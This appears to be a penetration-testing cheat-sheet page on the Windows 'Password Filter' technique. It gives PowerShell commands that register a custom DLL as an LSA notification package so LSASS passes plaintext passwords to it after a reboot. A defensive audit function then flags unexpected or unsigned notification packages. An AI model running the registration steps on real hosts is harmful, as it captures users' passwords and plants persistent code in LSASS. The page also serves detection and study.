# Password Filter

* <https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/>
* <https://github.com/clymb3r/Misc-Windows-Hacking/tree/master/HookPasswordChange>
* <https://pentestlab.blog/2020/02/10/credential-access-password-filter-dll/>
* <https://github.com/3gstudent/PasswordFilter>

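Register a custom DLL as an LSA notification package so that LSASS loads it at boot and calls its `PasswordChangeNotify` export with the plaintext password whenever a password change is performed (the passwords will appear in `C:\logFile?.txt` files). Copying into `System32` and writing under `HKLM` require administrative rights, and the package is only loaded after the reboot: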

```powershell
PS > $passwordFilterName = (Copy-Item "Win32Project3.dll" -Destination "C:\Windows\System32" -PassThru).basename
PS > $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
PS > $notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
PS > $notificationPackagesValues += $passwordFilterName
PS > Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
PS > Restart-Computer -Confirm
```
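To audit a host for this technique, the following added example (not from the original page or the referenced projects) lists every entry in `Notification Packages`, flags names outside an allow-list and reports each DLL's signature status. The function name and the allow-list (`scecli`, `rassfm`) are assumptions; replace the list with your own baseline.

```powershell
# Added defensive audit example; not code from the original page.
# Assumption: 'scecli' and 'rassfm' are the expected packages on this host.
function Test-LsaNotificationPackages {
    param(
        [string[]]$Allowed = @('scecli', 'rassfm'),
        [string]$LsaPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    )

    # REG_MULTI_SZ value: one package name per entry, without the .dll extension.
    $packages = @(Get-ItemPropertyValue -Path $LsaPath -Name 'Notification Packages')

    foreach ($name in ($packages | Where-Object { $_ })) {
        # LSASS resolves package names to DLLs in System32.
        $dll    = Join-Path $env:SystemRoot "System32\$name.dll"
        $exists = Test-Path -LiteralPath $dll
        $sig    = if ($exists) { Get-AuthenticodeSignature -LiteralPath $dll } else { $null }

        [pscustomobject]@{
            Package   = $name
            Allowed   = $Allowed -contains $name
            Path      = $dll
            Exists    = $exists
            # Older PowerShell versions may report catalog-signed OS files as NotSigned.
            Signature = if ($sig) { [string]$sig.Status } else { 'n/a' }
            Signer    = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
            LastWrite = if ($exists) { (Get-Item -LiteralPath $dll).LastWriteTimeUtc } else { $null }
        }
    }
}

# Show only entries that need review: not in the baseline, or not validly signed.
Test-LsaNotificationPackages |
    Where-Object { -not $_.Allowed -or $_.Signature -ne 'Valid' } |
    Format-Table -AutoSize
```

Run it from an elevated 64-bit PowerShell session so that `System32` is not redirected; an empty result means every registered package is in the baseline and validly signed.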
